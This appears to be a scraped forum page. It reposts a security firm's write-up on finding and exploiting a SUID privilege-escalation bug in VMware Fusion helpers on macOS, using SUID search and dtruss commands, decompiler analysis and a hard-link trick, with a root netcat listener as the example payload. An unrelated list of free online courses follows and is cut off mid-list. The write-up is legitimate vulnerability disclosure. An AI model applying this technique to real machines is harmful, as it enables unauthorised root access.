Nytro

Analyzing SUID Binaries March 17, 2020 GRIMM Analyzing SUID Binaries In our spare time, we hunt for bugs in various pieces of software. Thus, when winding down from a project recently, we decided it might be fun to audit one of our own laptops to see if we can locate a local privilege escalation (LPE) vulnerability in the software we use every day. This blog post describes the process for: scanning a MacBook Pro to find a target, conducting dynamic analysis with dtruss, analyzing the binary to determine the root cause, and bypassing the binary’s restrictions to obtain root privileges. The write-up and the code for the vulnerability described in this blog post can be found on our NotQuite0DayFriday repository here: https://github.com/grimm-co/NotQuite0DayFriday/tree/master/2020.03.17-vmware-fusion Finding Targets LPE vulnerabilities come in many shapes and sizes, such as kernel vulnerabilities, vulnerabilities in privileged services, and vulnerabilities in SUID binaries. As described in our previous blog post, kernel exploits have additional complexities to ensure they don’t accidentally crash the computer being exploited. On the other hand, SUID binaries are a much more compelling target as they run as root regardless of the user that executes the binary and vulnerabilities in SUID binaries will rarely crash the computer. Additionally, it is not uncommon for third-party vendors to implement SUID binary helper programs without taking the necessary security precautions. SUID binaries must protect themselves from local attackers, and thus must take into account a substantially different threat model than most software. When choosing a target for the challenge, we started by searching the laptop for SUID binaries with a simple find command: Figure 1. Third-party SUID Applications on the author’s MacBook Pro We chose to focus on SUID binaries within the /Applications directory to ensure we would only find SUID binaries in third-party applications. The SUID binaries included with the base system are generally of a higher quality, and thus less likely to have many shallow bugs. As such, we proceeded with analyzing the found VMware Fusion and VirtualBox SUID binaries. A Nice Surprise We decided to trace the executables with dtruss, a dtrace helper utility. Dtruss will show us the syscalls that a binary executes, similar to strace on Linux. # Copy the SUID binaries to a single directory (and remove spaces) bash-3.2$ find /Applications/ -perm +6000 -exec /bin/sh -c 'cp "{}" $(basename "{}"|sed "s/ /_/g")' \; # Run each of the binaries in dtruss and record their syscalls bash-3.2$ for i in *; do sudo dtruss -f ./$i 2>&1 | tee /tmp/trace_$i.txt; done Next, we looked through each of the syscalls lists for indicators of the mistakes typically made within SUID binaries. Since SUID binaries are run as root, they must ensure that they only load trusted libraries and only run trusted executables. As such, we used grep to look for any execve syscalls and any open syscalls with the filename ending in dylib (the extension for a library on macOS): Figure 2. The execve and open calls in the Third-party SUID Applications Looking at the results, we noticed that the Open VMWare Fusion Services and Open VMware USB Arbitrator Service executables, which we’ve copied to a subfolder in a home directory, are trying to run non-existent executables. Also the vmware-authd, vmware-vmx, vmware-vmx-debug, and vmware-vmx-stats executables are trying to load a non-existent libcrypto.1.0.2.dylib library. From the list of executed syscalls, it appeared that the VMWare SUID binaries are having trouble locating the other VMWare libraries and executables. A Journey Through IDA In order to figure out what was happening in these binaries, we began analyzing them in IDA. The two Opener daemons follow a similar code path, so we will only describe the Open VMware USB Arbitrator Service daemon here. The Hex-Rays decompiler output shown below is the executable’s main function. Figure 3. The main function of the Open VMware USB Arbitrator Service daemon This function makes three main function calls. The Location_Init function looks up the tool name “usbarb-opener” in a list of tools (shown below). The number associated with the tool name is saved to the NumberOfUpCounts global variable which is later used in the LocationGetRoot function. Figure 4. The list of tools in the Open VMware USB Arbitrator Service daemon Similarly, the LocationGetRoot function looks up the “usbarbDaemonFile” string in a separate list to find the relative path to the VMware USB Arbitrary Service executable. Figure 5. The tool path prefix list in the Open VMware USB Arbitrator Service daemon Then the LocationGetRoot function, as shown below, calls the HostInfo_GetModulePath function. This function is a simple wrapper around _NSGetExecutablePath and returns the file path of the main executable. When the executable is in the normal VMware directory, this will return the string “/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service”. Next, it calls resolve_realpath, a wrapper around the realpath function, to resolve any symbolic links in the file path. The function then uses the while loop to repeatedly remove the last four slashes in the file path, where four is taken from the global variable NumberOfUpCounts, set in Location_Init previously. Thus, it is finding the third parent directory of the executable’s directory. In a typical execution, this while loop will produce the string “/Applications/VMware Fusion.app”. Lastly, the function returns the combined parent directory and relative path to produce the string, “/Applications/VMware Fusion.app/Contents/Library/services/VMware USB Arbitrator Service”. Figure 6. The directory traversal bug in the Open VMware USB Arbitrator Service daemon The final call in the main function is to serviceImpl, which uses the returned path to start the USB service without performing any other verification on the path. Fooling _NSGetExecutablePath and realpath As we saw in the previous section, the two Opener daemons will try to run a program relative to the Opener daemon’s path. Thus, if we can find a way to run the Opener daemon from another location, we can make the SUID daemon execute an arbitrary program. In the dtruss example, we copied the Opener daemons to the home directory. However, when a SUID binary is copied, it loses its SUID status. Additionally, unprivileged users lack the ability to move the executable. Furthermore, symbolic links will be resolved by the realpath call, and thus they will not trick the programs into using the symbolic link’s location. However, unlike Linux, macOS allows unprivileged users to create hard links to SUID executables. As hard links are not resolved by realpath, the Opener daemons will be fooled into using an incorrect directory. GRIMM’s NotQuite0DayFriday repository on GitHub contains two exploits for this vulnerability, which create the expected directory layout, compile a payload, hard link to the SUID Openers, and then execute the hard link to run the payload as root. The example payload for this exploit starts a netcat listener as root on TCP port 3333. Figure 7. Example output of the bug being used to obtain root privileges Conclusion SUID binaries provide an easy way for developers to allow unprivileged users to call their privileged application. However, without adequate security, they can provide the means for an attacker to escalate privileges and takeover a computer. As such, SUID binaries should be avoided whenever possible and heavily audited when required. This post illustrates how a slight deviation from the expected behavior resulted in a directory traversal vulnerability that an attacker could exploit to obtain root privileges. Want to join us and exploit some binaries? We’re hiring. Need help auditing or exploiting your binaries? Feel free to contact us. Sursa: https://blog.grimm-co.com/post/analyzing-suid-binaries/

Nu stiu de ce, dar am tendinta sa ma indoiesc de credibilitatea acestor informatii.

190 universities just launched 600 free online courses. Here’s the full list. Dhawal Shah Oct 9th, 2018 Facebook Twitter Envelope Url 50 If you haven’t heard, universities around the world offering their courses online for free (or at-least partially free). These courses are collectively called as MOOCS or Massive Open Online Courses. In the past seven years or so, over 800 universities have created around 10,000 of these MOOCs. And I’ve been keeping track of these MOOCs the entire time here at Class Central, ever since they rose to prominence. In the past four months alone, 190 universities have announced 600 such free online courses. I’ve compiled this list below and categorized the courses into the following subjects: Computer Science, Mathematics, Programming, Data Science, Humanities, Social Sciences, Education & Teaching, Health & Medicine, Business, Personal Development, Engineering, Art & Design, and finally Science. Here’s the full list of new free online courses. Most of these are completely self-paced, so you can start taking them at your convenience. PROGRAMMING CS50’s Introduction to Game Development from Harvard University CS50’s Mobile App Development with React Native from Harvard University CS50’s Web Programming with Python and JavaScript from Harvard University Functions, Methods, and Interfaces in Go from University of California, Irvine Concurrency in Go from University of California, Irvine Getting Started with Go from University of California, Irvine Computing in Python I: Fundamentals and Procedural Programming from Georgia Institute of Technology Computing in Python IV: Objects & Algorithms from Georgia Institute of Technology Computing in Python III: Data Structures from Georgia Institute of Technology Computing in Python II: Control Structures from Georgia Institute of Technology Projet de programmation (en Java) from École Polytechnique Fédérale de Lausanne Pixel Art for Video Games from Michigan State University Web Design: Strategy and Information Architecture from California Institute of the Arts Front-End Web Development with React from The Hong Kong University of Science and Technology Multiplatform Mobile App Development with React Native from The Hong Kong University of Science and Technology Automated Software Testing: Practical Skills for Java Developers from Delft University of Technology Automated Software Testing: Advanced Skills for Java Developers from Delft University of Technology Погружение в Python from Moscow Institute of Physics and Technology Основы разработки на C++: красный пояс from Moscow Institute of Physics and Technology AR (Augmented Reality) & Video Streaming Services Emerging Technologies from Yonsei University Smart Device & Mobile Emerging Technologies from Yonsei University Problem Solving, Programming, and Video Games from University of Alberta Introduction to Augmented Reality and ARCore from Google Daydream Impact Fundamentals of NetLogo from Santa Fe Institute Competitive Programmer’s Core Skills from Saint Petersburg State University Business Problems and Software Solutions from Deakin University Введение в язык Котлин from St. Petersburg State Polytechnic University Web Accessibility for Developers from Ryerson University Handheld AR App Development with Unity from Unity Diseño de Sistemas de información gerencial para Internet con MySQL / PHP y Joomla from Universidad del Rosario Kotlin for Java Developers from JetBrains Introduction to XR: VR, AR, and MR Foundations from Unity 3D Art and Audio Pipeline from Unity Application Systems Programming from Unity 3D Interactions and Navigation from Unity Core Interaction Programming from Unity ENGINEERING Analysis of Transport Phenomena I: Mathematical Methods from Massachusetts Institute of Technology Engineering the Space Shuttle from Massachusetts Institute of Technology The Art of Structural Engineering: Vaults from Princeton University Collaborative Robot Safety: Design & Deployment from University at Buffalo Electric Power Systems from University at Buffalo Modern Robotics, Course 5: Robot Manipulation and Wheeled Mobile Robots from Northwestern University Le robot Thymio comme outil de découverte des sciences du numérique from École Polytechnique Fédérale de Lausanne Principle of Semiconductor Devices Part I: Semiconductors, PN Junctions and Bipolar Junction Transistors from The Hong Kong University of Science and Technology Hello (Real) World with ROS – Robot Operating System from Delft University of Technology Mind of the Universe – Robots in Society: Blessing or Curse? from Delft University of Technology Hyperloop: Changing the Future of Transportation from Delft University of Technology Electric Cars: Technology from Delft University of Technology Electric Cars: Policy from Delft University of Technology Through Engineers’ Eyes – Expanding the Vision: Engineering Mechanics by Experiment, Analysis and Design from University of New South Wales Through Engineers’ Eyes – Introducing the Vision: Engineering Mechanics by Experiment, Analysis and Design from University of New South Wales First Order Optical System Design from University of Colorado Boulder Design of High-Performance Optical Systems from University of Colorado Boulder Optical Efficiency and Resolution from University of Colorado Boulder Motors and Motor Control Circuits from University of Colorado Boulder Semiconductor Physics from University of Colorado Boulder Sensors and Sensor Circuit Design from University of Colorado Boulder Transistor – Field Effect Transistor and Bipolar Junction Transistor from University of Colorado Boulder Diode – pn Junction and Metal Semiconductor Contact from University of Colorado Boulder Diseño de diques rompeolas con cubípodos from Universitat Politècnica de València Introducción a la energía solar fotovoltaica: El módulo fotovoltaico from Universitat Politècnica de València Introducción a los encofrados y las cimbras en obra civil y edificación from Universitat Politècnica de València BIM Fundamentals for Engineers from National Taiwan University BIM Application for Engineers from National Taiwan University Distribución de la energía eléctrica from Tecnológico de Monterrey Smart grid: fundamentos técnicos from Tecnológico de Monterrey Transmisión de energía eléctrica from Tecnológico de Monterrey Energía eléctrica: conceptos y principios básicos from Tecnológico de Monterrey Smart grid: las redes eléctricas del futuro from Tecnológico de Monterrey Essentials of MOSFETs from Purdue University Fundamentals of Current Flow from Purdue University Primer on Semiconductor Fundamentals from Purdue University Introduzione ai circuiti elettrici from University of Naples Federico II Standardisation from EIT Digital Introduction to battery-management systems from University of Colorado System Equivalent Circuit Cell Model Simulation from University of Colorado System Battery State-of-Charge (SOC) Estimation from University of Colorado System Introduction to Web Cartography: Part 2 from ETH Zurich High Performance Finite Element Modeling – Part 2 from KTH Royal Institute of Technology Energy Systems Integration: A Trend or a Revolution? from KU Leuven University Propagation radio from Institut Mines-Télécom “Monotsukuri” Making Things in Japan: Mechanical Engineering from Tokyo Institute of Technology Ingeniería de Tráfico from Pontificia Universidad Católica de Chile Introducción al Control Numérico por Computadora from TenarisUniversity Agile for Project Control from University System of Maryland COMPUTER SCIENCE Machine Learning with Python: from Linear Models to Deep Learning from Massachusetts Institute of Technology Blockchain Technology from University of California, Berkeley Bitcoin and Cryptocurrencies from University of California, Berkeley Introduction to Machine Learning from Duke University Introduction to Computer Programming from University of London International Programmes How Computers Work from University of London International Programmes IT Infrastructure and Emerging Trends from University of Minnesota Enterprise Systems from University of Minnesota IS/IT Governance from University of Minnesota Embedded Software and Hardware Architecture from University of Colorado Boulder Industrial IoT Markets and Security from University of Colorado Boulder Введение в технологию блокчейн from Moscow Institute of Physics and Technology 人工智慧：機器學習與理論基礎 (Artificial Intelligence – Learning & Theory) from National Taiwan University Introducción al diseño de hardware con Verilog from Galileo University IoT (Internet of Things) Wireless & Cloud Computing Emerging Technologies from Yonsei University Introduzione all’informatica from University of Naples Federico II Il linguaggio naturale, dall’uomo alla macchina from University of Naples Federico II Nuove tecnologie digitali from University of Naples Federico II C Programming: Language Foundations from Institut Mines-Télécom C Programming: Modular Programming and Memory Management from Dartmouth C Programming: Advanced Data Types from Dartmouth Linux Basics: The Command Line Interface from Dartmouth C Programming: Using Linux Tools and Libraries from Dartmouth C Programming: Getting Started from Dartmouth C Programming: Pointers and Memory Management from Dartmouth Introduction to Computation Theory from Santa Fe Institute Fundamentals of Machine Learning from Santa Fe Institute Introduction to FinTech from The University of Hong Kong FinTech Ethics and Risks from The University of Hong Kong Blockchain and FinTech: Basics, Applications, and Limitations from The University of Hong Kong DDoS Attacks and Defenses from University of Colorado System Cloud Computing Security from University of Colorado System Introducción a la programación en C: Instrucciones de control y ficheros de texto from Universidad Autónoma de Madrid Introducción a la programación en C: Tipos de datos y estructuras from Universidad Autónoma de Madrid Introducción a la programación en C: Funciones y punteros from Universidad Autónoma de Madrid Cyber-Physical Networks from KTH Royal Institute of Technology Comprendre le coeur d’internet : les réseaux d’opérateurs from Institut Mines-Télécom Advanced Algorithmics and Graph Theory with Python from Institut Mines-Télécom Arduino Programming, from novice to ninja from Institut Mines-Télécom Ciberseguridad: ataques y contramedidas from Universidad Rey Juan Carlos Digital Transformation and the IT Team from University of the Witwatersrand Strategic and Transformational IT from University System of Maryland Basics of Network Security from Coventry University An Introduction to Cryptography from Coventry University Diseño de sistemas de información gerencial para intranet con Microsoft Access from Universidad del Rosario Palo Alto Networks Cybersecurity Essentials I from Palo Alto Networks Palo Alto Networks Academy Cybersecurity Foundation from Palo Alto Networks Palo Alto Networks Cybersecurity Gateway I from Palo Alto Networks Palo Alto Networks Cybersecurity Gateway II from Palo Alto Networks Palo Alto Networks Cybersecurity Essentials II from Palo Alto Networks Blockchain: Foundations and Use Cases from ConsenSys Academy Networking and Security Architecture with VMware NSX from VMware SOCIAL SCIENCES Citizen Politics in America: Public Opinion, Elections, Interest Groups, and the Media from Harvard University U.S. Public Policy: Social, Economic, and Foreign Policies from Harvard University American Government: Constitutional Foundations from Harvard University U.S. Political Institutions: Congress, Presidency, Courts, and Bureaucracy from Harvard University Lean Research Skills for Conducting Interviews from Massachusetts Institute of Technology Creating an Effective Child Welfare System from University of Pennsylvania Listening to Puerto Rico Teach-Out from University of Michigan Crisis at the Border Teach-Out from University of Michigan Exploring Basic Income in a Changing Economy Teach-Out from University of Michigan Community Engagement: Collaborating for Change from University of Michigan Civil Liberties from Princeton University Corporate & Commercial Law II: Business Forms, Financing & Governmental Regulation from University of Illinois at Urbana-Champaign Understanding Gender Identity: Trans People in the Workplace from The Open University Make Change Happen from The Open University Introduction to English Common Law from University of London International Programmes African cities : An Introduction to Urban Planning from École Polytechnique Fédérale de Lausanne Groundscape Architecture Design Lab, re-thinking cities underground from École Polytechnique Fédérale de Lausanne Logic for Economists from University of Amsterdam Mathematics for economists from Higher School of Economics Возможно ли воспитать детей «правильно»? from Higher School of Economics Monetary Policy in the Asia Pacific from The Hong Kong University of Science and Technology Copyright Law in the Music Business from Berklee College of Music Business Opportunities and Risks in a Globalized Economy from IE Business School Xi Jinping’s Thought on Socialism with Chinese Characteristics for a New era|习近平新时代中国特色社会主义思想 from Tsinghua University Exploring Psychology’s Core Concepts|走进心理学 from Tsinghua University Accessibility to the Scenic Arts from Universitat Autònoma de Barcelona (Autonomous University of Barcelona) Originalité et modernité du mutualisme from ESSEC Business School Belong / Appartenir: Community, Race, and Space in the U.S. and France from Davidson College Survey Research Methodology from Politecnico di Milano Action Learning for Inclusion from Politecnico di Milano Regards croisés sur les migrations from Université catholique de Louvain SDG: Moving Towards Sustainable Work from Universidad Carlos iii de Madrid Conversazioni di diritto amministrativo from University of Naples Federico II Introducción a la teoría política: conceptos y grandes pensadores from University of Naples Federico II Comparative Political Systems from University of Naples Federico II Contemporary Issues in World Politics from University of Naples Federico II Global Politics from University of Naples Federico II La riforma del lavoro in Italia from University of Naples Federico II Le politiche pubbliche come strategia di governo from University of Naples Federico II Le forme di governo nel mondo from University of Naples Federico II Comparative Research Designs and Methods from University of Naples Federico II Psicologia della personalità: un’introduzione from University of Naples Federico II Come fare ricerca nelle scienze sociali from University of Naples Federico II Landscape Finance: Investing in Innovation for Sustainable Landscapes from Wageningen University Landscape Governance: Collaborating Across Sectors and Scales from Wageningen University Landscape Leadership: Catalyse Sustainable Development in Landscapes from Wageningen University Development and Planning in African Cities: Exploring theories, policies and practices from Sierra Leone from University College London Vote For Ethics: A How-to Guide for Voters (Alumni Students) from Santa Clara University Vote For Ethics: A How-to Guide for Voters from Santa Clara University The Presidency and the Shape of the Supreme Court from Trinity College Sustainable Construction and Development from London South Bank University Globalisation and Sustainable Development from Curtin University Circular Economy – Sustainable Materials Management from Ghent University Social Change: How Can Marketing Help? from Griffith University Supporting Adolescent Learners: Social and Emotional Wellbeing from Griffith University Правовое обеспечение бизнеса в России from Saint Petersburg State University Neurociencia empresarial: siete claves para la PYME from Universidad Rey Juan Carlos Des réseaux pour comprendre le monde from Université Paris 1 Panthéon-Sorbonne Sustainable Development: The Water-Energy-Food Nexus from RWTH Aachen University Osez le numérique dans l’Economie Sociale, l’Habitat Social et la Protection Sociale ! from Université Jean Moulin Lyon 3 The Supreme Court & American Politics from University System of Maryland Security, Terrorism and Counterterrorism from Murdoch University Микроэкономика (вводный курс) from Moscow State Institute of International Relations (MGIMO) Le consommateur connecté & ses données personnelles from Institut national de la consommation Communicating Effectively with Vulnerable Children and Young People from University of Kent SCIENCE The Health Effects of Climate Change from Harvard University Backyard Meteorology: The Science of Weather from Harvard University Quantum Information Science II: Efficient Quantum Computing – fault tolerance and complexity from Massachusetts Institute of Technology Quantum Information Science II: Quantum states, noise and error correction from Massachusetts Institute of Technology Quantum Information Science II: Advanced quantum algorithms and information theory from Massachusetts Institute of Technology Nuclear Energy: Science, Systems and Society from Massachusetts Institute of Technology Nitrogen: A Global Challenge (Hungarian) from University of Edinburgh Nitrogen: A Global Challenge from University of Edinburgh Global Arctic from École Polytechnique Fédérale de Lausanne The Multi-scale brain from École Polytechnique Fédérale de Lausanne Conservation & Protected Areas Management in Africa from École Polytechnique Fédérale de Lausanne Gestion des aires protégées en Afrique from École Polytechnique Fédérale de Lausanne Equine Welfare and Management from University of California, Davis Open Science: Sharing Your Research with the World from Delft University of Technology The Building Blocks of a Quantum Computer: Part 1 from Delft University of Technology The Building Blocks of a Quantum Computer: Part 2 from Delft University of Technology Ácidos y bases: reacciones químicas y aplicaciones from Universitat Politècnica de València Sales: reacciones químicas y aplicaciones from Universitat Politècnica de València Small and Mighty: Introduction to Microbiology from University of Reading Mercados de carbono: una forma de mitigar el cambio climático from Tecnológico de Monterrey Ahorro de energía from Tecnológico de Monterrey Huella Hídrica: una mirada integral al uso del agua from Tecnológico de Monterrey Física: Vectores, Trabajo y Energía from Tecnológico de Monterrey Física: Dimensión y Movimiento from Tecnológico de Monterrey Introduction to the Schrödinger Equation and Quantum Transport from Purdue University D’un infini à l’autre – Voyages de l’infiniment grand à l’infiniment petit from École Polytechnique Case Study Methodology from Politecnico di Milano Nuclear Reactor Physics Basics from National Research Nuclear University MEPhI Methods of Surface Analysis from National Research Nuclear University MEPhI La fisica: dall’elettromagnetismo all’ottica from University of Naples Federico II La genetica tra scienza, storia e società from University of Naples Federico II Zoologia from University of Naples Federico II Astro 101: Black Holes from University of Alberta Catalytic Conversions for Biobased Chemicals and Products from Wageningen University Biorefinery: From Biomass to Building Blocks of Biobased Products from Wageningen University From Fossil Resources to Biomass: A Business and Economics Perspective from Wageningen University Climate Adaptation in Africa from University of Cape Town The Science Behind Forensic Science from King’s College London Sex and Human Reproduction from University of Adelaide Research Impact: Making a Difference from University of Glasgow Metagenomics applied to surveillance of pathogens and antimicrobial resistance from Technical University of Denmark (DTU) 走进天文学 from Nanjing University Our Place in the Universe from The University of Hong Kong Landscape Ecology from ETH Zurich Systematic Innovation for Life Science from Karolinska Institutet Why Planning Your Research Matters from Deakin University Protists: Evolution and Ecology of Microbial Eukaryotes from Saint Petersburg State University Air pollution: causes and impacts from Institut Mines-Télécom Metal and Metalloids of the Main Groups: Basis and Their Role in the Daily Life from Universidad Rey Juan Carlos Gulf Stories 2 from University of West Florida Citizen Research: From Data to Action from University of Dundee Research integrity in scientific professions from Université de Bordeaux Intégrité scientifique dans les métiers de la recherche from Université de Bordeaux Conceptos base para el estudio del medio ambiente from Universidad Austral Introducción a la gravedad cuántica de lazos from Universidad Nacional de Córdoba Introducción a los ritmos y relojes biológicos from Universidad Nacional de Córdoba Chimie : ouvrez les portes de l’enseignement supérieur ! from University of Liège Global Biosecurity for One Health from Murdoch University ART & DESIGN 18th-Century Opera: Handel & Mozart from Harvard University Avatar Psychology for Designers from Michigan State University Web Design: Wireframes to Prototypes from California Institute of the Arts UX Design Fundamentals from California Institute of the Arts Visual Elements of User Interface Design from California Institute of the Arts Percepção Musical from Berklee College of Music Guitar Scales and Chord Progressions from Berklee College of Music Fundamentos de la guitarra eléctrica y acústica from Berklee College of Music Разработка инновационного продукта from Moscow Institute of Physics and Technology Radio para internet con Podcast: creación y conceptos básicos from Universitat Politècnica de València Sustainability in Architecture: An Interdisciplinary Introduction from Universitat Politècnica de València Realistic Architectural 3D Modeling from Indian Institute of Technology Bombay 3D Modeling from Architectural Drawings from Indian Institute of Technology Bombay Flower Arrangements in China and Japan | 现代生活美学：花之道 from Tsinghua University L’écoute en jeu(x) : une introduction à la musicologie from Université Paris-Saclay Introducing Metadesign from Politecnico di Milano Caligrafía y paleografía: espacios históricos para su estudio y práctica from Universidad Carlos iii de Madrid Adobe Illustrator: aprende a crear presentaciones de impacto from The Pontificia Universidad Javeriana Innovation Through Design: Think, Make, Break, Repeat from The University of Sydney Interpreting Vernacular Architecture in Asia from The University of Hong Kong Creative Thinking: Techniques and Tools for Success from Imperial College London Music Psychology: Why Does “Bohemian Rhapsody” Feel so Good? from Griffith University Exploring Japanese Avant-garde Art Through Butoh Dance from Keio University The Power of Podcasting for Storytelling from University of Wollongong Learn Jazz Piano: III. Solo Piano and Advanced Topics from Goldsmiths University of London Основы фотографии from Novosibirsk State University Растровая графика. Adobe Photoshop CC from St. Petersburg State Polytechnic University The Dream of Streaming: Rethinking the Role of On-Demand Entertainment from Coventry University MATHEMATICS Introduction to Probability from Harvard University Differential Equations: Fourier Series and Partial Differential Equations from Massachusetts Institute of Technology Probability – The Science of Uncertainty and Data from Massachusetts Institute of Technology Fundamentals of Statistics from Massachusetts Institute of Technology Causal Inference from Columbia University Probability and Statistics: To p or not to p? from University of London International Programmes Introduction au raisonnement mathématique : préparation à l’entrée dans l’enseignement supérieur from École Polytechnique Matrix Algebra for Engineers from The Hong Kong University of Science and Technology Introducción a las ecuaciones diferenciales from Galileo University Laboratorio di Matematica per Architettura from Politecnico di Milano Automated Reasoning: satisfiability from EIT Digital Random Walks from Santa Fe Institute Game Theory II- Dynamic Games from Santa Fe Institute Introduction to Information Theory from Santa Fe Institute Functions and Iterations from Santa Fe Institute Introduction to Renormalization from Santa Fe Institute Introduction to Differential Equations from Santa Fe Institute Ordinary Differential Equations from Santa Fe Institute Game Theory I – Static Games from Santa Fe Institute Maximum Entropy Methods from Santa Fe Institute Vector and Matrix Algebra from Santa Fe Institute Sta(r)tistics: Statistics for everyone – Applied statistics for new science students from University of Sunderland HUMANITIES Othello’s Story from Harvard University PredictionX: Lost Without Longitude from Harvard University Sikhism Through Its Scriptures from Harvard University The Tabernacle in Word & Image: An Italian Jewish Manuscript Revealed from University of Pennsylvania HOPE: Human Odyssey to Political Existentialism from Princeton University Sports Marketing from Northwestern University Introduction to Research Ethics: Working with People from University of Leeds Introduction to Linguistics from University of Birmingham Violences et religions from University of Geneva Upper-Intermediate English: Technology Today from Universitat Politècnica de València Upper-Intermediate English: Globalization from Universitat Politècnica de València Upper-Intermediate English: Modern Life from Universitat Politècnica de València Upper-Intermediate English: Business from Universitat Politècnica de València 莊子─人情 (Zhuangzi─Between People) from National Taiwan University Learning Chinese : Start From Scratch (零到一學中文) from National Taiwan University Ideological & Moral Cultivation and Fundamentals of Law|思想道德修养与法律基础 from Tsinghua University Develop Your Cultural Intelligence from Purdue University Mandarin Chinese for Intermediate Learners: Part 1 from Shanghai Jiao Tong University Imparare il latino attraverso lo studio dei papiri from University of Naples Federico II Dialetti in Italia from University of Naples Federico II Letteratura latina, dalle origini all’età augustea from University of Naples Federico II Perdón y reconciliación: cómo sanar heridas from The Pontificia Universidad Javeriana Learning Spanish in Paradise from The Pontificia Universidad Javeriana Sports Coaching: How effective are you? from IOC Athlete MOOC John Milton: Paradise Lost from Dartmouth Religious Transformation in Early China: the Period of Division from The Chinese University of Hong Kong The Book of Kells: Exploring an Irish Medieval Masterpiece from Trinity College Dublin Toledo: Deciphering Secrets of Medieval Spain from University of Colorado System Lancaster Castle and Northern English History: The View from the Stronghold from Lancaster University Learning from the Past: A Guide for the Curious Researcher from The University of Nottingham How We Remember War and Violence: Theory and Practice from University of Bath Introducción al griego clásico from Universidad Autónoma de Madrid Noongar Language and Culture from Curtin University A Question of Time: How We Date Human Evolution from Griffith University Взаимодействие языков и культур: сохраняем и расширяем свою идентичность (на примере изучения татарского языка как родного и иностранного) from Tomsk State University Русский язык как иностранный B2-2 from Saint Petersburg State University Histoire des représentations et du traitement de la folie from Paris Diderot University School of Salamanca from Universidad Francisco Marroquín New Zealand Landscape as Culture: Maunga (Mountains) from Victoria University of Wellington Coaching the Mental Game from Deakin University Civil Society and African Media Policy in the Digital Age from University of the Witwatersrand Verdun d’hier à aujourd’hui from Université de Lorraine Activism and Citizen Journalism through Media from University of the Witwatersrand Media Literacy and Representation from University of Newcastle Digital Wellbeing from University of York Renforcer ses compétences orthographiques from Université de Caen Normandie Éthique de la recherche from Université de Lyon Irish 104: An Introduction to Irish Language and Culture from Dublin City University Norwegian for Beginners 1 from Norwegian University of Science and Technology Mindfulness: What It Is, Where It Comes From, and How to Practice It from Naropa University Irish 106: An Introduction to Irish Language and Culture from Dublin City University La Gestothèque from Sorbonne Paris Cité University Le bien-être des animaux d’élevage from VetAgro Sup Pratiques de l’enseignement de la prononciation en FLE from Université fédérale de Toulouse Midi-Pyrénées Cours de stratégie de l’École de Guerre (Partie I) from École Pratique des Hautes Études Irish 105: An Introduction to Irish Language and Culture from Dublin City University ga094: 東日本大震災の教訓を活かした実践的防災学へのアプローチ from Tohoku University BUSINESS Improving Your Business Through a Culture of Health from Harvard University Introduction to Systematic Reviews from Stanford Medicine The Role of Impact Assessments in Real Estate Development from Massachusetts Institute of Technology Creating Shared Benefits in Real Estate Development from Massachusetts Institute of Technology FinTech Law and Policy from Duke University Auditing I: Conceptual Foundations of Auditing from University of Illinois at Urbana-Champaign Auditing II: The Practice of Auditing from University of Illinois at Urbana-Champaign Managing My Money for Young Adults from The Open University Using Email for Networking in English from University of Washington Natural Gas from University at Buffalo Safety in the Utility Industry from University at Buffalo Energy Industry: The Enterprise from University at Buffalo Agile Meets Design Thinking from University of Virginia Customer Segmentation and Prospecting from Northwestern University Building a Toolkit for Your Sales Process from Northwestern University Sales Pitch and Closing from Northwestern University Connecting with Sales Prospects from Northwestern University Юридическое оформление инвестиционных идей from Higher School of Economics FinTech Security and Regulation (RegTech) from The Hong Kong University of Science and Technology FinTech Risk Management from The Hong Kong University of Science and Technology Market Segmentation Analysis from University of Queensland Influencing Stakeholders: Dealing with Power and Dynamics in Teams and Networks from Delft University of Technology Waste Management and Critical Raw Materials from Delft University of Technology Sustainable Packaging in a Circular Economy from Delft University of Technology Effective Decision Making: Dealing with Business Complexity from Delft University of Technology Electric Cars: Business from Delft University of Technology Measure and Improve Innovation at the Workplace from Universitat Politècnica de València Branding: ¿cómo convertirte en una gran marca? from Universitat Politècnica de València Foreign Exchange Markets: Concepts, Instruments, Risks and Derivatives from Indian Institute of Management Bangalore Special Topics in Risk Management of Banking and Financial Markets from Indian Institute of Management Bangalore Banking & Financial Intermediation: Concepts, Risks, Capital & Regulation from Indian Institute of Management Bangalore Risk Management in Banking and Financial Markets Professional Certificate Exam from Indian Institute of Management Bangalore Money & Debt Markets: Concepts, Instruments, Risks and Derivatives from Indian Institute of Management Bangalore Equity Stock Markets: Concepts, Instruments, Risks and Derivatives from Indian Institute of Management Bangalore 服務模式的體驗、設計與創新：從痛點到賣點 from National Taiwan University Mercados de energía: oportunidades de negocio from Tecnológico de Monterrey Liderazgo en la empresa familiar from Tecnológico de Monterrey Fundamentos del emprendimiento en la empresa familiar from Tecnológico de Monterrey Intelligence Tools for the Digital Age from IE Business School Social and Digital Media Analytics from Purdue University Introduction to Strategic Doing: An Agile Approach to Strategy from Purdue University L’innovation managériale en pratique from ESSEC Business School L’excellence opérationnelle en pratique from ESSEC Business School Designing and Implementing Effective Entrepreneurship Policies from Politecnico di Milano Человеческий фактор в разработке корпоративных систем from National Research Nuclear University MEPhI Strategie di produzione e sistemi di logistica from University of Naples Federico II Financial Regulation in Emerging Markets and the Rise of Fintech Companies from University of Cape Town Executing Breakthrough Innovations with the Three Box Solution from Dartmouth Developing Breakthrough Innovations with the Three Box Solution from Dartmouth Influencer Marketing Strategy from Rutgers University Supply Chain Analytics Essentials from Rutgers University Culture of Services: Paradox of Customer Relations from Kyoto University Finance for Startups from Korea Advanced Institute of Science and Technology Advanced Valuation and Strategy – M&A, Private Equity, and Venture Capital from Erasmus University Rotterdam Organisational design: Know your organisation from Macquarie University Organisational behaviour: Know your people from Macquarie University Risk Management of Work Related injuries using RAMP II from KTH Royal Institute of Technology Proficiency in using RAMP for Risk Management of work-related injuries from KTH Royal Institute of Technology Assessment of Work-Related Injury Risks using RAMP I from KTH Royal Institute of Technology Entreprendre dans les Industries Culturelles à l’ère du numérique from Institut d’Etudes Politiques de Paris Прикладное управление рисками from Tomsk State University Практики создания аналитических панелей в среде Microsof Power BI from Saint Petersburg State University Основы налогообложения бизнеса в России from Saint Petersburg State University Основы бизнес-планирования и маркетинга from Saint Petersburg State University Emprendimiento: cómo gestionar el desarrollo tecnológico de una startup from Universidad Rey Juan Carlos Управление людьми и командами from Saint Petersburg State University Discover the Leader in You: Six Questions to Ask Yourself from Austin Peay State University Dans le secteur alimentaire, le digital : c’est primordial ! from Université Jean Moulin Lyon 3 Banque, assurance, assistance : le digital, une opportunité à saisir 